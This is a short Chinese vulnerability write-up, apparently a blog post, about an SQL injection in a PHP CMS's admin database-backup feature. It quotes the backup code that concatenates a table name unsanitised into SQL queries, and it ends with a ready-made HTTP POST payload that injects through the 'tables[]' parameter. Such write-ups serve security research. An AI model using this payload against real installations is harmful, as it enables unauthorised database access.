标签:row pos show file fetch 结束 query strong his
---恢复内容开始---
for($i = $tableid; $i < $tablenumber && strlen($sqldump) < $vol_size * 1024; $i++) { $sqldump .= $backup->sql_dumptable($tables[$i], $vol_size, $startfrom, strlen($sqldump)); $startfrom = 0; }
跟进sql_dumptable函数
function sql_dumptable($table, $vol_size, $startfrom = 0, $currsize = 0) {$offset = 100; if (!$startfrom) { $tabledump = "DROP TABLE IF EXISTS `$table`;\n"; // die("SHOW CREATE TABLE $table"); $createtable = $GLOBALS[‘dou‘]->query("SHOW CREATE TABLE $table"); $create = $GLOBALS[‘dou‘]->fetch_array($createtable); $tabledump .= $create[1] . ";\n\n"; if ($GLOBALS[‘dou‘]->version() > ‘4.1‘ && $this->sqlcharset) { $tabledump = preg_replace("/(DEFAULT)*\s*CHARSET=[a-zA-Z0-9]+/", "DEFAULT CHARSET=" . $this->sqlcharset, $tabledump); } } $tabledumped = 0; $numrows = $offset; while ($currsize + strlen($tabledump) < $vol_size && $numrows == $offset) { $tabledumped = 1; //die("SELECT * FROM $table LIMIT $startfrom, $offset"); $rows = $GLOBALS[‘dou‘]->query("SELECT * FROM $table LIMIT $startfrom, $offset"); }
构造payload
POST /admin/backup.php?rec=backup HTTP/1.1 tables%5B%5D=dou_admin where 1=1*#&startfrom=1&file_name=D20171110T165601&vol_size=2048&token=5c9a08d0&totalsize=119&submit=%E7%A1%AE%E5%AE%9A%E5%A4%87%E4%BB%BD
---恢复内容结束---
标签:row pos show file fetch 结束 query strong his
原文地址:http://www.cnblogs.com/test404/p/7816087.html
